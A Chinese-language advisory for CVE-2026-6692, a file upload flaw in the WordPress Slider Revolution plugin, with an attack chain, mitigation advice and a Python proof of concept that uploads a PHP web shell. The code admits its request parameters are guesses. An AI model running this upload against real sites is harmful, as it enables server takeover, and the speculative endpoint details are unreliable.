CVE-2026-6692 CVSS 8.8 高危

CVE-2026-6692 WP Slider Revolution任意文件上传

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6692

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Slider Revolution Plugin

漏洞概述

WordPress Slider Revolution插件在7.0.0至7.0.10版本中存在任意文件上传漏洞。该漏洞源于插件在处理媒体文件时，`_get_media_url`和`_check_file_path`函数未能有效验证文件类型。拥有订阅者及以上权限的认证攻击者可利用此漏洞上传恶意文件，从而导致服务器被远程控制。该漏洞已在7.0.11版本中彻底修复。

技术细节

该漏洞的核心在于Slider Revolution插件对上传文件的类型校验机制存在缺陷。在受影响版本中，`_get_media_url`和`_check_file_path`函数仅依赖客户端或简单的后端检查，未能严格限制可上传的文件扩展名或MIME类型。攻击者利用订阅者权限，构造特定的HTTP请求，即可绕过安全限制，将PHP等可执行脚本上传至Web目录。一旦上传成功，攻击者通过访问该脚本文件即可在服务器端执行任意代码，获取系统权限。

攻击链分析

STEP 1

信息收集

攻击者扫描目标站点，确认其使用了WordPress并安装了Slider Revolution插件，且版本在7.0.0至7.0.10之间。

STEP 2

获取凭证

攻击者通过注册或暴力破解获取一个订阅者（Subscriber）级别的账户凭证。

STEP 3

上传恶意文件

攻击者使用该账户登录，并向存在漏洞的`_get_media_url`相关接口发送特制的数据包，绕过文件类型检查，上传包含恶意代码的PHP文件。

STEP 4

执行代码

攻击者通过浏览器访问已上传的恶意文件路径，触发服务器解析PHP代码，从而获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: WordPress Slider Revolution < 7.0.11 - Arbitrary File Upload (RCE)
# Date: 2026-05-07
# Exploit Author: Analyst
# Vendor Homepage: https://www.sliderrevolution.com/
# Software Link: https://wordpress.org/plugins/revslider/
# Version: 7.0.0 - 7.0.10
# Tested on: WordPress 6.x

# Configuration
target_url = 'http://target-site.com'
username = 'subscriber'
password = 'password'
shell_filename = 'shell.php'

# Login to get session
session = requests.Session()
login_data = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/'}
session.post(target_url + '/wp-login.php', data=login_data)

# Payload generation
# The vulnerable endpoint is typically related to the media handling functions.
# This is a conceptual PoC based on the vulnerability description.
upload_url = target_url + '/wp-admin/admin-ajax.php'

# Multipart data simulating the vulnerable request
files = {
    'file': (shell_filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}
data = {
    'action': 'revslider_ajax_action', # Example action, needs verification
    'client_action': 'update_plugin'   # Example action, needs verification
}

response = session.post(upload_url, files=files, data=data)

if response.status_code == 200 and 'success' in response.text:
    print(f"[+] Shell uploaded successfully!")
    print(f"[+] Access your shell at: {target_url}/wp-content/uploads/{shell_filename}?cmd=whoami")
else:
    print("[-] Upload failed. Check permissions or endpoint.")

影响范围

Slider Revolution 7.0.0

Slider Revolution 7.0.10

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Slider Revolution插件以阻断攻击路径。同时，检查服务器上是否存在异常的可执行文件（如.php文件位于非标准目录），并使用Web服务器配置（如Nginx的location规则或Apache的.htaccess）禁用上传目录的脚本执行权限。此外，应加强对低权限账户的活动监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表